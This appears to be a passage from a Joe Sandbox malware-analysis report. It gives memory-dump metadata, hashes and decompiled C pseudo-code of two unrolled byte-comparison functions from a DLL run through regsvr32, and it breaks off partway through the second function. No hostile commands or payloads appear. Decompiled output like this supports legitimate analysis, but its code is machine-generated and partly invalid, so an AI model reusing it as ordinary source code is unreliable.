                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e7fd
                                                                                                                0x1003e7d8
                                                                                                                0x1003e7dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e7dc
                                                                                                                0x1003e7b7
                                                                                                                0x1003e7bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e711
                                                                                                                0x1003e711
                                                                                                                0x1003e715
                                                                                                                0x1003e719
                                                                                                                0x1003e71b
                                                                                                                0x1003e732
                                                                                                                0x1003e732
                                                                                                                0x1003e736
                                                                                                                0x1003e73a
                                                                                                                0x1003e73c
                                                                                                                0x1003e753
                                                                                                                0x1003e753
                                                                                                                0x1003e757
                                                                                                                0x1003e75b
                                                                                                                0x1003e75d
                                                                                                                0x1003e774
                                                                                                                0x1003e774
                                                                                                                0x1003e778
                                                                                                                0x1003e77c
                                                                                                                0x1003e77e
                                                                                                                0x1003e784
                                                                                                                0x1003e787
                                                                                                                0x1003e78b
                                                                                                                0x1003e78b
                                                                                                                0x00000000
                                                                                                                0x1003e77e
                                                                                                                0x1003e763
                                                                                                                0x1003e766
                                                                                                                0x1003e76a
                                                                                                                0x1003e76e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e76e
                                                                                                                0x1003e742
                                                                                                                0x1003e745
                                                                                                                0x1003e749
                                                                                                                0x1003e74d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e74d
                                                                                                                0x1003e721
                                                                                                                0x1003e724
                                                                                                                0x1003e728
                                                                                                                0x1003e72c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e72c
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction ID: ca44cfd0a9ed2ed662c286f7cfcf6575917ef5e6bc8068de1d2b6de3d8688f10
                                                                                                                • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                • Instruction Fuzzy Hash: DCD160B3C0A9F34E8376C52D405822FEEA2AFC169272BC7E1DCD43F289D6265D0496D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E2E9(void* __eax, void* __ecx) {
                                                                                                                				void* _t191;
                                                                                                                				signed int _t192;
                                                                                                                				void* _t195;
                                                                                                                				signed char _t201;
                                                                                                                				signed char _t202;
                                                                                                                				signed char _t203;
                                                                                                                				signed char _t204;
                                                                                                                				signed char _t206;
                                                                                                                				signed int _t211;
                                                                                                                				signed int _t309;
                                                                                                                				void* _t312;
                                                                                                                				void* _t314;
                                                                                                                				void* _t316;
                                                                                                                				void* _t318;
                                                                                                                				void* _t321;
                                                                                                                				void* _t323;
                                                                                                                				void* _t325;
                                                                                                                				void* _t328;
                                                                                                                				void* _t330;
                                                                                                                				void* _t332;
                                                                                                                				void* _t335;
                                                                                                                				void* _t337;
                                                                                                                				void* _t339;
                                                                                                                				void* _t342;
                                                                                                                				void* _t344;
                                                                                                                				void* _t346;
                                                                                                                				void* _t349;
                                                                                                                				void* _t351;
                                                                                                                				void* _t353;
                                                                                                                
                                                                                                                				_t195 = __ecx;
                                                                                                                				_t191 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1e)) ==  *((intOrPtr*)(__ecx - 0x1e))) {
                                                                                                                					_t309 = 0;
                                                                                                                					L15:
                                                                                                                					if(_t309 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t201 =  *(_t191 - 0x1a);
                                                                                                                					if(_t201 ==  *(_t195 - 0x1a)) {
                                                                                                                						_t309 = 0;
                                                                                                                						L26:
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t202 =  *(_t191 - 0x16);
                                                                                                                						if(_t202 ==  *(_t195 - 0x16)) {
                                                                                                                							_t309 = 0;
                                                                                                                							L37:
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t203 =  *(_t191 - 0x12);
                                                                                                                							if(_t203 ==  *(_t195 - 0x12)) {
                                                                                                                								_t309 = 0;
                                                                                                                								L48:
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								_t204 =  *(_t191 - 0xe);
                                                                                                                								if(_t204 ==  *(_t195 - 0xe)) {
                                                                                                                									_t309 = 0;
                                                                                                                									L59:
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									if( *(_t191 - 0xa) ==  *(_t195 - 0xa)) {
                                                                                                                										_t309 = 0;
                                                                                                                										L70:
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t206 =  *(_t191 - 6);
                                                                                                                										if(_t206 ==  *(_t195 - 6)) {
                                                                                                                											_t309 = 0;
                                                                                                                											L81:
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											if( *(_t191 - 2) ==  *(_t195 - 2)) {
                                                                                                                												_t192 = 0;
                                                                                                                												L3:
                                                                                                                												return _t192;
                                                                                                                											}
                                                                                                                											_t312 = ( *(_t191 - 2) & 0x000000ff) - ( *(_t195 - 2) & 0x000000ff);
                                                                                                                											if(_t312 == 0) {
                                                                                                                												L4:
                                                                                                                												_t192 = ( *(_t191 - 1) & 0x000000ff) - ( *(_t195 - 1) & 0x000000ff);
                                                                                                                												if(_t192 != 0) {
                                                                                                                													_t192 = (0 | _t192 > 0x00000000) + (0 | _t192 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L3;
                                                                                                                											}
                                                                                                                											_t211 = (0 | _t312 > 0x00000000) + (0 | _t312 > 0x00000000) - 1;
                                                                                                                											if(_t211 != 0) {
                                                                                                                												_t192 = _t211;
                                                                                                                												goto L3;
                                                                                                                											}
                                                                                                                											goto L4;
                                                                                                                										}
                                                                                                                										_t314 = (_t206 & 0x000000ff) - ( *(_t195 - 6) & 0x000000ff);
                                                                                                                										if(_t314 == 0) {
                                                                                                                											L74:
                                                                                                                											_t316 = ( *(_t191 - 5) & 0x000000ff) - ( *(_t195 - 5) & 0x000000ff);
                                                                                                                											if(_t316 == 0) {
                                                                                                                												L76:
                                                                                                                												_t318 = ( *(_t191 - 4) & 0x000000ff) - ( *(_t195 - 4) & 0x000000ff);
                                                                                                                												if(_t318 == 0) {
                                                                                                                													L78:
                                                                                                                													_t309 = ( *(_t191 - 3) & 0x000000ff) - ( *(_t195 - 3) & 0x000000ff);
                                                                                                                													if(_t309 != 0) {
                                                                                                                														_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L81;
                                                                                                                												}
                                                                                                                												_t309 = (0 | _t318 > 0x00000000) + (0 | _t318 > 0x00000000) - 1;
                                                                                                                												if(_t309 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L78;
                                                                                                                											}
                                                                                                                											_t309 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L76;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t314 > 0x00000000) + (0 | _t314 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L74;
                                                                                                                									}
                                                                                                                									_t321 = ( *(_t191 - 0xa) & 0x000000ff) - ( *(_t195 - 0xa) & 0x000000ff);
                                                                                                                									if(_t321 == 0) {
                                                                                                                										L63:
                                                                                                                										_t323 = ( *(_t191 - 9) & 0x000000ff) - ( *(_t195 - 9) & 0x000000ff);
                                                                                                                										if(_t323 == 0) {
                                                                                                                											L65:
                                                                                                                											_t325 = ( *(_t191 - 8) & 0x000000ff) - ( *(_t195 - 8) & 0x000000ff);
                                                                                                                											if(_t325 == 0) {
                                                                                                                												L67:
                                                                                                                												_t309 = ( *(_t191 - 7) & 0x000000ff) - ( *(_t195 - 7) & 0x000000ff);
                                                                                                                												if(_t309 != 0) {
                                                                                                                													_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L70;
                                                                                                                											}
                                                                                                                											_t309 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
                                                                                                                											if(_t309 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L67;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L65;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L63;
                                                                                                                								}
                                                                                                                								_t328 = (_t204 & 0x000000ff) - ( *(_t195 - 0xe) & 0x000000ff);
                                                                                                                								if(_t328 == 0) {
                                                                                                                									L52:
                                                                                                                									_t330 = ( *(_t191 - 0xd) & 0x000000ff) - ( *(_t195 - 0xd) & 0x000000ff);
                                                                                                                									if(_t330 == 0) {
                                                                                                                										L54:
                                                                                                                										_t332 = ( *(_t191 - 0xc) & 0x000000ff) - ( *(_t195 - 0xc) & 0x000000ff);
                                                                                                                										if(_t332 == 0) {
                                                                                                                											L56:
                                                                                                                											_t309 = ( *(_t191 - 0xb) & 0x000000ff) - ( *(_t195 - 0xb) & 0x000000ff);
                                                                                                                											if(_t309 != 0) {
                                                                                                                												_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											goto L59;
                                                                                                                										}
                                                                                                                										_t309 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
                                                                                                                										if(_t309 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L56;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L54;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t328 > 0x00000000) + (0 | _t328 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L52;
                                                                                                                							}
                                                                                                                							_t335 = (_t203 & 0x000000ff) - ( *(_t195 - 0x12) & 0x000000ff);
                                                                                                                							if(_t335 == 0) {
                                                                                                                								L41:
                                                                                                                								_t337 = ( *(_t191 - 0x11) & 0x000000ff) - ( *(_t195 - 0x11) & 0x000000ff);
                                                                                                                								if(_t337 == 0) {
                                                                                                                									L43:
                                                                                                                									_t339 = ( *(_t191 - 0x10) & 0x000000ff) - ( *(_t195 - 0x10) & 0x000000ff);
                                                                                                                									if(_t339 == 0) {
                                                                                                                										L45:
                                                                                                                										_t309 = ( *(_t191 - 0xf) & 0x000000ff) - ( *(_t195 - 0xf) & 0x000000ff);
                                                                                                                										if(_t309 != 0) {
                                                                                                                											_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                										}
                                                                                                                										goto L48;
                                                                                                                									}
                                                                                                                									_t309 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
                                                                                                                									if(_t309 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									goto L45;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L43;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t335 > 0x00000000) + (0 | _t335 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L41;
                                                                                                                						}
                                                                                                                						_t342 = (_t202 & 0x000000ff) - ( *(_t195 - 0x16) & 0x000000ff);
                                                                                                                						if(_t342 == 0) {
                                                                                                                							L30:
                                                                                                                							_t344 = ( *(_t191 - 0x15) & 0x000000ff) - ( *(_t195 - 0x15) & 0x000000ff);
                                                                                                                							if(_t344 == 0) {
                                                                                                                								L32:
                                                                                                                								_t346 = ( *(_t191 - 0x14) & 0x000000ff) - ( *(_t195 - 0x14) & 0x000000ff);
                                                                                                                								if(_t346 == 0) {
                                                                                                                									L34:
                                                                                                                									_t309 = ( *(_t191 - 0x13) & 0x000000ff) - ( *(_t195 - 0x13) & 0x000000ff);
                                                                                                                									if(_t309 != 0) {
                                                                                                                										_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                									}
                                                                                                                									goto L37;
                                                                                                                								}
                                                                                                                								_t309 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
                                                                                                                								if(_t309 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L32;
                                                                                                                						}
                                                                                                                						_t309 = (0 | _t342 > 0x00000000) + (0 | _t342 > 0x00000000) - 1;
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L30;
                                                                                                                					}
                                                                                                                					_t349 = (_t201 & 0x000000ff) - ( *(_t195 - 0x1a) & 0x000000ff);
                                                                                                                					if(_t349 == 0) {
                                                                                                                						L19:
                                                                                                                						_t351 = ( *(_t191 - 0x19) & 0x000000ff) - ( *(_t195 - 0x19) & 0x000000ff);
                                                                                                                						if(_t351 == 0) {
                                                                                                                							L21:
                                                                                                                							_t353 = ( *(_t191 - 0x18) & 0x000000ff) - ( *(_t195 - 0x18) & 0x000000ff);
                                                                                                                							if(_t353 == 0) {
                                                                                                                								L23:
                                                                                                                								_t309 = ( *(_t191 - 0x17) & 0x000000ff) - ( *(_t195 - 0x17) & 0x000000ff);
                                                                                                                								if(_t309 != 0) {
                                                                                                                									_t309 = (0 | _t309 > 0x00000000) + (0 | _t309 > 0x00000000) - 1;
                                                                                                                								}
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t309 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
                                                                                                                							if(_t309 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						_t309 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
                                                                                                                						if(_t309 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L21;
                                                                                                                					}
                                                                                                                					_t309 = (0 | _t349 > 0x00000000) + (0 | _t349 > 0x00000000) - 1;
                                                                                                                					if(_t309 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L19;
                                                                                                                				} else {
                                                                                                                					__esi = __dl & 0x000000ff;
                                                                                                                					__edx =  *(__ecx - 0x1e) & 0x000000ff;
                                                                                                                					__esi = (__dl & 0x000000ff) - ( *(__ecx - 0x1e) & 0x000000ff);
                                                                                                                					if(__esi == 0) {
                                                                                                                						L8:
                                                                                                                						__esi =  *(__eax - 0x1d) & 0x000000ff;
                                                                                                                						__edx =  *(__ecx - 0x1d) & 0x000000ff;
                                                                                                                						__esi = ( *(__eax - 0x1d) & 0x000000ff) - ( *(__ecx - 0x1d) & 0x000000ff);
                                                                                                                						if(__esi == 0) {
                                                                                                                							L10:
                                                                                                                							__esi =  *(__eax - 0x1c) & 0x000000ff;
                                                                                                                							__edx =  *(__ecx - 0x1c) & 0x000000ff;
                                                                                                                							__esi = ( *(__eax - 0x1c) & 0x000000ff) - ( *(__ecx - 0x1c) & 0x000000ff);
                                                                                                                							if(__esi == 0) {
                                                                                                                								L12:
                                                                                                                								__esi =  *(__eax - 0x1b) & 0x000000ff;
                                                                                                                								__edx =  *(__ecx - 0x1b) & 0x000000ff;
                                                                                                                								__esi = ( *(__eax - 0x1b) & 0x000000ff) - ( *(__ecx - 0x1b) & 0x000000ff);
                                                                                                                								if(__esi != 0) {
                                                                                                                									0 = 0 | __esi > 0x00000000;
                                                                                                                									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                									__esi = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                								}
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							0 = 0 | __esi > 0x00000000;
                                                                                                                							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                							__esi = __edx;
                                                                                                                							if(__edx != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						0 = 0 | __esi > 0x00000000;
                                                                                                                						__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                						__esi = __edx;
                                                                                                                						if(__edx != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					0 = 0 | __esi > 0x00000000;
                                                                                                                					__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                					__esi = __edx;
                                                                                                                					if(__edx != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					goto L8;
                                                                                                                				}
                                                                                                                				L1:
                                                                                                                				_t192 = _t309;
                                                                                                                				goto L3;
                                                                                                                			}
































                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4fa
                                                                                                                0x1003e4d5
                                                                                                                0x1003e4d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4d9
                                                                                                                0x1003e4b4
                                                                                                                0x1003e4b8
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e4b8
                                                                                                                0x1003e416
                                                                                                                0x1003e418
                                                                                                                0x1003e42f
                                                                                                                0x1003e437
                                                                                                                0x1003e439
                                                                                                                0x1003e450
                                                                                                                0x1003e458
                                                                                                                0x1003e45a
                                                                                                                0x1003e471
                                                                                                                0x1003e479
                                                                                                                0x1003e47b
                                                                                                                0x1003e488
                                                                                                                0x1003e488
                                                                                                                0x00000000
                                                                                                                0x1003e47b
                                                                                                                0x1003e467
                                                                                                                0x1003e46b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e46b
                                                                                                                0x1003e446
                                                                                                                0x1003e44a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e44a
                                                                                                                0x1003e425
                                                                                                                0x1003e429
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e429
                                                                                                                0x1003e387
                                                                                                                0x1003e389
                                                                                                                0x1003e3a0
                                                                                                                0x1003e3a8
                                                                                                                0x1003e3aa
                                                                                                                0x1003e3c1
                                                                                                                0x1003e3c9
                                                                                                                0x1003e3cb
                                                                                                                0x1003e3e2
                                                                                                                0x1003e3ea
                                                                                                                0x1003e3ec
                                                                                                                0x1003e3f9
                                                                                                                0x1003e3f9
                                                                                                                0x00000000
                                                                                                                0x1003e3ec
                                                                                                                0x1003e3d8
                                                                                                                0x1003e3dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e3dc
                                                                                                                0x1003e3b7
                                                                                                                0x1003e3bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e3bb
                                                                                                                0x1003e396
                                                                                                                0x1003e39a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e2f1
                                                                                                                0x1003e2f1
                                                                                                                0x1003e2f4
                                                                                                                0x1003e2f8
                                                                                                                0x1003e2fa
                                                                                                                0x1003e311
                                                                                                                0x1003e311
                                                                                                                0x1003e315
                                                                                                                0x1003e319
                                                                                                                0x1003e31b
                                                                                                                0x1003e332
                                                                                                                0x1003e332
                                                                                                                0x1003e336
                                                                                                                0x1003e33a
                                                                                                                0x1003e33c
                                                                                                                0x1003e353
                                                                                                                0x1003e353
                                                                                                                0x1003e357
                                                                                                                0x1003e35b
                                                                                                                0x1003e35d
                                                                                                                0x1003e363
                                                                                                                0x1003e366
                                                                                                                0x1003e36a
                                                                                                                0x1003e36a
                                                                                                                0x00000000
                                                                                                                0x1003e35d
                                                                                                                0x1003e342
                                                                                                                0x1003e345
                                                                                                                0x1003e349
                                                                                                                0x1003e34d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e34d
                                                                                                                0x1003e321
                                                                                                                0x1003e324
                                                                                                                0x1003e328
                                                                                                                0x1003e32c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e32c
                                                                                                                0x1003e300
                                                                                                                0x1003e303
                                                                                                                0x1003e307
                                                                                                                0x1003e30b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003e30b
                                                                                                                0x1003db02
                                                                                                                0x1003db02
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction ID: 06533223066f455be3a1f7e95cfcf3cdbef0f6b12c1fe5cebf42f92fef6d6eaa
                                                                                                                • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                • Instruction Fuzzy Hash: 2BD15FB3C0A9F34E8377C52D505822FEAA2EFC169271BC7E1DCD42F289D6265E0495D0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003DEDD(void* __eax, void* __ecx) {
                                                                                                                				void* _t183;
                                                                                                                				signed int _t184;
                                                                                                                				void* _t187;
                                                                                                                				signed char _t193;
                                                                                                                				signed char _t194;
                                                                                                                				signed char _t195;
                                                                                                                				signed char _t196;
                                                                                                                				signed char _t198;
                                                                                                                				signed int _t296;
                                                                                                                				void* _t299;
                                                                                                                				void* _t301;
                                                                                                                				void* _t303;
                                                                                                                				void* _t306;
                                                                                                                				void* _t308;
                                                                                                                				void* _t310;
                                                                                                                				void* _t313;
                                                                                                                				void* _t315;
                                                                                                                				void* _t317;
                                                                                                                				void* _t320;
                                                                                                                				void* _t322;
                                                                                                                				void* _t324;
                                                                                                                				void* _t327;
                                                                                                                				void* _t329;
                                                                                                                				void* _t331;
                                                                                                                				void* _t334;
                                                                                                                				void* _t336;
                                                                                                                				void* _t338;
                                                                                                                
                                                                                                                				_t187 = __ecx;
                                                                                                                				_t183 = __eax;
                                                                                                                				if( *((intOrPtr*)(__eax - 0x1d)) ==  *((intOrPtr*)(__ecx - 0x1d))) {
                                                                                                                					_t296 = 0;
                                                                                                                					L12:
                                                                                                                					if(_t296 != 0) {
                                                                                                                						goto L1;
                                                                                                                					}
                                                                                                                					_t193 =  *(_t183 - 0x19);
                                                                                                                					if(_t193 ==  *(_t187 - 0x19)) {
                                                                                                                						_t296 = 0;
                                                                                                                						L23:
                                                                                                                						if(_t296 != 0) {
                                                                                                                							goto L1;
                                                                                                                						}
                                                                                                                						_t194 =  *(_t183 - 0x15);
                                                                                                                						if(_t194 ==  *(_t187 - 0x15)) {
                                                                                                                							_t296 = 0;
                                                                                                                							L34:
                                                                                                                							if(_t296 != 0) {
                                                                                                                								goto L1;
                                                                                                                							}
                                                                                                                							_t195 =  *(_t183 - 0x11);
                                                                                                                							if(_t195 ==  *(_t187 - 0x11)) {
                                                                                                                								_t296 = 0;
                                                                                                                								L45:
                                                                                                                								if(_t296 != 0) {
                                                                                                                									goto L1;
                                                                                                                								}
                                                                                                                								_t196 =  *(_t183 - 0xd);
                                                                                                                								if(_t196 ==  *(_t187 - 0xd)) {
                                                                                                                									_t296 = 0;
                                                                                                                									L56:
                                                                                                                									if(_t296 != 0) {
                                                                                                                										goto L1;
                                                                                                                									}
                                                                                                                									if( *(_t183 - 9) ==  *(_t187 - 9)) {
                                                                                                                										_t296 = 0;
                                                                                                                										L67:
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										_t198 =  *(_t183 - 5);
                                                                                                                										if(_t198 ==  *(_t187 - 5)) {
                                                                                                                											_t296 = 0;
                                                                                                                											L78:
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											_t184 = ( *(_t183 - 1) & 0x000000ff) - ( *(_t187 - 1) & 0x000000ff);
                                                                                                                											if(_t184 != 0) {
                                                                                                                												_t184 = (0 | _t184 > 0x00000000) + (0 | _t184 > 0x00000000) - 1;
                                                                                                                											}
                                                                                                                											L2:
                                                                                                                											return _t184;
                                                                                                                										}
                                                                                                                										_t299 = (_t198 & 0x000000ff) - ( *(_t187 - 5) & 0x000000ff);
                                                                                                                										if(_t299 == 0) {
                                                                                                                											L71:
                                                                                                                											_t301 = ( *(_t183 - 4) & 0x000000ff) - ( *(_t187 - 4) & 0x000000ff);
                                                                                                                											if(_t301 == 0) {
                                                                                                                												L73:
                                                                                                                												_t303 = ( *(_t183 - 3) & 0x000000ff) - ( *(_t187 - 3) & 0x000000ff);
                                                                                                                												if(_t303 == 0) {
                                                                                                                													L75:
                                                                                                                													_t296 = ( *(_t183 - 2) & 0x000000ff) - ( *(_t187 - 2) & 0x000000ff);
                                                                                                                													if(_t296 != 0) {
                                                                                                                														_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                													}
                                                                                                                													goto L78;
                                                                                                                												}
                                                                                                                												_t296 = (0 | _t303 > 0x00000000) + (0 | _t303 > 0x00000000) - 1;
                                                                                                                												if(_t296 != 0) {
                                                                                                                													goto L1;
                                                                                                                												}
                                                                                                                												goto L75;
                                                                                                                											}
                                                                                                                											_t296 = (0 | _t301 > 0x00000000) + (0 | _t301 > 0x00000000) - 1;
                                                                                                                											if(_t296 != 0) {
                                                                                                                												goto L1;
                                                                                                                											}
                                                                                                                											goto L73;
                                                                                                                										}
                                                                                                                										_t296 = (0 | _t299 > 0x00000000) + (0 | _t299 > 0x00000000) - 1;
                                                                                                                										if(_t296 != 0) {
                                                                                                                											goto L1;
                                                                                                                										}
                                                                                                                										goto L71;
                                                                                                                									}
                                                                                                                									_t306 = ( *(_t183 - 9) & 0x000000ff) - ( *(_t187 - 9) & 0x000000ff);
                                                                                                                									if(_t306 == 0) {
                                                                                                                										L60:
                                                                                                                										_t308 = ( *(_t183 - 8) & 0x000000ff) - ( *(_t187 - 8) & 0x000000ff);
                                                                                                                										if(_t308 == 0) {
                                                                                                                											L62:
                                                                                                                											_t310 = ( *(_t183 - 7) & 0x000000ff) - ( *(_t187 - 7) & 0x000000ff);
                                                                                                                											if(_t310 == 0) {
                                                                                                                												L64:
                                                                                                                												_t296 = ( *(_t183 - 6) & 0x000000ff) - ( *(_t187 - 6) & 0x000000ff);
                                                                                                                												if(_t296 != 0) {
                                                                                                                													_t296 = (0 | _t296 > 0x00000000) + (0 | _t296 > 0x00000000) - 1;
                                                                                                                												}
                                                                                                                												goto L67;
                                                                                                                											}
